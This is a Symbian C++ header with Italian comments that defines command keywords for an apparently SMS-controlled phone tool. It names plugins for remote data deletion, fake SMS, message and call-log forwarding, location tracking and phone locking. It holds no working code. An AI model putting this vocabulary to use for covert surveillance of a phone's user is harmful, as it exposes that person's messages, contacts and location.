//
// CLocalize.h
// Copyright © 2001 Symbian Ltd. All rights reserved.
//

#ifndef _PLUGINS_COMMON__
#define _PLUGINS_COMMON__

#define INIT_REPLY_LEN	2000

// Plugins...
_LIT(KALARM,		"Alarm");
_LIT(KDELETE,		"Delete");
_LIT(KFAKESMS,		"FakeSMS");
_LIT(KRETRIEVE,		"Retrieve");
_LIT(KLOCALIZE,		"Localize");
_LIT(KMONITOR,		"Monitor");
_LIT(KCONFIG,		"Config");
_LIT(KCOMMANDS,		"Commands");
_LIT(KWLANINFO,		"WLanInfo");
_LIT(KLOCK,			"Lock");
_LIT(KNULL,			"*Null*");


// Costanti varie
_LIT(KOFF,			"OFF");
_LIT(KON,			"ON");
_LIT(KYES,			"YES");
_LIT(KNO,			"NO");
_LIT(KNOREPLY,		"NOREPLY");
_LIT(KSPACE,		" ");
_LIT(KDESTNUMBER,	"DESTNUMBER");
_LIT(KCRLF,			"\n");


// DELETE
// TODO: Aggiungere Impegni
_LIT(KEMAILS,		"EMAILS");
_LIT(KIMAGES,		"PICTURES");
_LIT(KVIDEOS,		"VIDEOS");
_LIT(KAUDIO,		"SOUNDS");
_LIT(KCALENDAR,		"CALENDAR");
_LIT(KHISTORY,		"HISTORY");
_LIT(KSMS,			"SMS");
_LIT(KCONTACTS,		"CONTACTS");
_LIT(KALL,			"ALL");


// FORWARD
_LIT(KINBOX, 		"INBOX");
_LIT(KOUTBOX, 		"OUTBOX");
_LIT(KINCALLS, 		"INCALLS");
_LIT(KOUTCALLS, 	"OUTCALLS");
_LIT(KMISSCALLS, 	"MISSCALLS");
_LIT(KFORMAT_DATE, 	"%H:%T %D%M%*Y%/0%1%/1%2%/2%3%/3");
//_LIT(KCONTACTS, "CONTACTS");


// CONFIG
_LIT(KLOCKPHONE,	"LOCKPHONE");
_LIT(KNEWNUMBER,	"NEWNUMBER");
_LIT(KNEWCODE,		"NEWCODE");
_LIT(KDISABLE,		"DISABLE");
_LIT(KSTOPSMS,		"STOPSMS");

//LIT(KNO,	"NO");
_LIT(KONSIMCHANGE,	"ONSIMCHANGE");
_LIT(KONSTARTUP,	"ONSTARTUP");


// LOCALIZE
_LIT(KQUANTITY,		"QUANTITY");
_LIT(KINTERVAL,		"INTERVAL");
_LIT(KUSECELLAFTER,	"USECELLAFTER");
_LIT(KAGPS,			"FASTFIX");


// ALARM
_LIT(KFREQ,			"FREQ");
_LIT(KTIME,			"TIME");
_LIT(KTIMER,		"TIMER");


// WLANINFO
_LIT(KADVANCED,		"ADVANCED");


// WLOCK
_LIT(KLOCKNO,		"NO");


// NULL
_LIT(KERR,		"ERR");
_LIT(KNAME,		"NAME");

#endif

